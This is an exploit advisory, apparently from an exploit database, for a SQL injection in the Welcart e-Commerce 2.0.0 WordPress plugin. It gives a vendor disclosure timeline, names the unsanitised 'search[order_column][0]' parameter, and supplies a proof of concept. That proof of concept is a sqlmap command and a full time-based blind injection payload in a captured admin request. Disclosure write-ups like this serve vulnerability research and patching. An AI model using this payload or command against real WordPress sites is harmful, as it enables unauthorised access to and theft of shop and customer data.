WordPress Welcart e-Commerce 2.0.0 SQL Injection

`# Exploit Title: WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection  
# Date: 04/08 2020  
# Exploit Author: Erik David Martin  
# Vendor Homepage: https://www.welcart.com/  
# Software Link: https://downloads.wordpress.org/plugin/usc-e-shop.2.0.0.zip  
# Category: Web Application  
# Version: 2.0.0  
# Tested on: Ubuntu 18.04.04 LTS / WordPress 5.4.2  
  
# 05/08 2020: Vendor notified  
# 06/08 2020: Vendor requested detailed information  
# 06/08 2020: Information provided  
# 11/08 2020: Vendor notified that a patch will be provided. No current ETA  
# 10/12 2020: Vulnerability fixed  
  
# 1. Description  
  
The POST parameter "search[order_column][0]" does not sanitize user input when searching through the order lists.  
  
# 2. Proof of Concept (PoC)  
  
Use ZAP/Burp to capture the web request when searching through existing order lists and save it to request.txt  
Referer: http://192.168.0.63/wp-admin/admin.php?page=usces_orderlist  
  
sqlmap -r request.txt --dbms=mysql -p search[order_column][0]  
  
Parameter: search[order_column][0] (POST)  
Type: time-based blind  
Payload: search[order_column][0]=ID) AND (SELECT 9900 FROM (SELECT(SLEEP(5)))tKPd) AND (8867=8867&search[order_word][0]=test&search[order_word_term][0]=contain&search[order_term]=AND&search[order_column][1]=&search[order_word][1]=&search[order_word_term][1]=contain&search[product_column][0]=&search[product_word][0]=&search[product_word_term][0]=contain&search[product_term]=AND&search[product_column][1]=&search[product_word][1]=&search[product_word_term][1]=contain&searchIn=Search&allchange[column]=&collective=&wc_nonce=5e3ed8895f&_wp_http_referer=/wp-admin/admin.php?page=usces_orderlist  
  
`